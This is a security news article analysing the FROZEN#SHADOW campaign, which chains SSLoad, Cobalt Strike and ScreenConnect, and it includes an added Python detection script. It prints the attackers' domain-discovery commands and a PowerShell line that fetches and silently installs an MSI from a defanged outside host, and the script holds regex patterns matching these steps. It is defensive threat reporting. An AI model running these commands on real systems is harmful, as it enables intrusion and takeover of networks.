Friday, January 24, 2025

New SSLoad Malware Combined With Tools Hijacking Entire Network Domain

A new attack campaign, tracked as FROZEN#SHADOW, has been discovered; it utilized SSLoad malware for its operations and Cobalt Strike implants to pivot and take over the entire network.

In addition, the threat actors also used Remote Monitoring and Management (RMM) software, namely ScreenConnect, for further control.

SSLoad is a well-designed malware that can stealthily infiltrate systems, gather sensitive information, and exfiltrate the collected data back to the malware operators.

Moreover, the malware also leverages multiple backdoors and payloads to evade detection and maintain persistence.

Technical Analysis

This new attack campaign starts with a traditional phishing email containing a malicious link.

When users visit this link, they are redirected through the mmtixmm[.]org URL to another download site, from which a JavaScript file is downloaded to the victim machine.


If this JavaScript file is manually executed, it performs several operations that download and execute further payloads on the victim machine.

The targeting of these phishing email campaigns appears to be random, as the victims were located in multiple countries across Asia, Europe, and the Americas.

Further investigations on the malware revealed that the attack takes place in different stages as follows:

  • Stage 1: Initial Execution – JavaScript
  • Stage 2: MSI File Execution
  • Stage 3: Malware Execution
  • Stage 4: Cobalt Strike Execution
  • Stage 5: RMM Software & Lateral Movement

Stage 1: Initial Execution – JavaScript

This initial stage involves the manual execution of the JavaScript file.

On analyzing the JS file out_czlrh.js, it was discovered that 97.6% of the file consisted of comment lines filled with random characters, used to obfuscate the file.

However, removing the commented code revealed clean JS code that did not have any further obfuscation.

JS file code with multiple commented code (Source: Securonix)

On analyzing the JS code, it was observed that the JS file performs multiple operations, starting with creating ActiveXObject instances for WScript.Network and Scripting.FileSystemObject.

After this, the JS code calls GetObject("winmgmts:\\\\.\\root\\cimv2") to obtain a WMI object for simple command-line operations.

Clean code after removing Comments from the JS code (Source: Securonix)

In addition, the code also sets up variables to manage the number of connection attempts and to track the connection status of a network share.

Further, the script maps the available drives to a network share located at \\wireoneinternet[.]info@80\share\.

The JS code also executes the "net use" command via WMI to map the network drive.

After this, there is a three-second wait, after which it again runs the same command to confirm the mapping of the network drive.

Once all these steps are successfully completed, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.

Stage 2: MSI Execution

This slack.msi file is similar to BazarBackdoor, which is often used by the TrickBot malware gang.

That malware was capable of infiltrating networks and deploying additional payloads. After executing this slack.msi file, the malware communicates with multiple domains:

  • wireoneinternet[.]info
  • skinnyjeanso[.]com
  • titnovacrion[.]top
  • Maramaravilha[.]com
  • globalsolutionunlimitedltd[.]com

Only after this is the SSLoad malware downloaded and executed.

The SSLoad payload consists of a semi-randomly named DLL file, which is located in \%APPDATA%\local\digistamp\mbae-api-na.dll.

This DLL is executed by rundll32.exe, after which the DLL copies itself to %APPDATA%\Custom_update\.

SSLoad DLL file details (Source: Securonix)

Stage 3: Malware Execution

In addition to the previous stage, the execution of the rundll32.exe command also begins communication with two preconfigured C2 servers, hxxps://skinnyjeanso[.]com/live/ and hxxps://titnovacrion[.]top/live/.

Following this, the malware begins to collect system and user data for the local host, as well as domain-related information, using the following cmd.exe commands:

  • cmd.exe /c ipconfig /all
  • cmd.exe /c systeminfo
  • cmd.exe /c nltest /domain_trusts
  • cmd.exe /c nltest /domain_trusts /all_trusts
  • cmd.exe /c net view /all /domain
  • cmd.exe /c net view /all
  • cmd.exe /c net group "domain admins" /domain
  • cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • cmd.exe /c net config workstation
  • cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
  • cmd.exe /c whoami /groups

The collected information is then sent to the C2 servers over HTTPS connections. Once the threat actors receive this information from the infected system, they begin to execute manual commands, but only after confirming that the information comes from a legitimate host and not from a honeypot. The manual commands executed by the threat actors are as follows:

  • powershell.exe -c "[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding('utf-8'); cd c:\; powershell"
  • whoami.exe /groups
  • net.exe group "domain admins" /dom
  • wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list

These commands were executed to probe the host environment in preparation for the next stage of malware activity.

Stage 4: Cobalt Strike Beacon

This stage involves deploying the Cobalt Strike beacon on the systems after the manual commands have been executed.

Once deployed, this beacon becomes the primary means of C2 communication. The beacon is dropped and executed via the following rundll32.exe command:

Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq

Additionally, the threat actors used the Cobalt Strike beacon to download and install a ScreenConnect RMM software instance on the victim system using the following commands:

  • cmd.exe /c whoami /groups
  • cmd.exe /c wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • cmd.exe /c iwr -uri "hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=" -outfile c:\programdata\msedgeview.msi
  • cmd.exe /c systeminfo
  • cmd.exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn

Stage 5: RMM Software And Lateral Movement

Every compromised system is controlled through the ScreenConnect RMM software, which gives the threat actors complete control over the host.

After this, lateral movement takes place, driven by the harvesting of credentials and other critical system details.

The environment is enumerated using multiple PowerShell cmdlets such as Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer.

Credential extraction is then performed, through which the attackers also obtain the NTLM hash of a domain admin account.
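The chain described across Stages 1 to 5 leaves a distinctive sequence of process command lines on an endpoint. The following Python script is an added example, not code from the article or from Securonix: it runs one regex per stage indicator named above over constructed process-creation events (host|parent|command line) and reports hosts on which several stages co-occur. The host names, drive letter Z:, parent processes and the DLL export name "Start" are assumptions.

```python
import re
from collections import defaultdict

# One regex per observable described in the article, keyed by the stage it belongs to.
STAGE_RULES = {
    "stage1_net_use_webdav_share": re.compile(r"\bnet(?:\.exe)?\s+use\b.*\\\\[^\\\s]+@\d+\\", re.I),
    "stage2_msiexec_from_mapped_drive": re.compile(r"\bmsiexec(?:\.exe)?\b.*\s/i\s+(?:[d-z]:\\|\\\\)\S*\.msi", re.I),
    "stage2_rundll32_appdata_dll": re.compile(r"\brundll32(?:\.exe)?\b.*\\(?:custom_update|digistamp)\\\S*\.dll", re.I),
    "stage3_wmi_av_enumeration": re.compile(r"securitycenter2\b.*antivirusproduct", re.I),
    "stage3_nltest_domain_trusts": re.compile(r"\bnltest(?:\.exe)?\s+/domain_trusts", re.I),
    "stage4_rundll32_programdata_dll": re.compile(r"\brundll32(?:\.exe)?\s+c:\\programdata\\[^\s,]+\.dll,", re.I),
    "stage4_screenconnect_msi_install": re.compile(r"\bmsiexec(?:\.exe)?\b.*\s/i\s+c:\\programdata\\\S*\.msi\b.*/q", re.I),
}

# Constructed sample events modelled on the FROZEN#SHADOW chain (host names, drive
# letter, parent processes and the "Start" export are made up; WS02 is benign noise).
SAMPLE_EVENTS = r"""
WS01|explorer.exe|wscript.exe C:\Users\u\Downloads\out_czlrh.js
WS01|wscript.exe|net use Z: \\wireoneinternet[.]info@80\share\ /persistent:no
WS01|wscript.exe|msiexec.exe /i Z:\slack.msi /quiet
WS01|msiexec.exe|rundll32.exe C:\Users\u\AppData\Roaming\Custom_update\mbae-api-na.dll,Start
WS01|rundll32.exe|cmd.exe /c nltest /domain_trusts /all_trusts
WS01|rundll32.exe|cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
WS01|services.exe|rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq
WS01|cmd.exe|msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn
WS02|explorer.exe|msiexec.exe /i C:\Users\u\Downloads\setup.msi /quiet
WS02|cmd.exe|ipconfig /all
"""


def scan_events(events_text, min_stages=3):
    """Match every rule against each command line and group hits per host.

    Returns {host: sorted stage names} for hosts with at least min_stages
    distinct indicators, so a single noisy msiexec on its own does not alert.
    """
    hits = defaultdict(set)
    for line in events_text.strip().splitlines():
        host, _parent, cmdline = line.split("|", 2)  # cmdline may itself contain '|'
        for name, rx in STAGE_RULES.items():
            if rx.search(cmdline):
                hits[host].add(name)
    return {h: sorted(s) for h, s in hits.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for host, stages in scan_events(SAMPLE_EVENTS).items():
        print(f"{host}: {len(stages)} FROZEN#SHADOW indicators -> {', '.join(stages)}")
```

On the sample data only WS01 is reported, with all seven indicators; WS02 produces no hits even with min_stages=1.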

Indicators Of Compromise


Furthermore, a complete list of files/hashes used for this attack campaign can be found here.

Eswar

Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
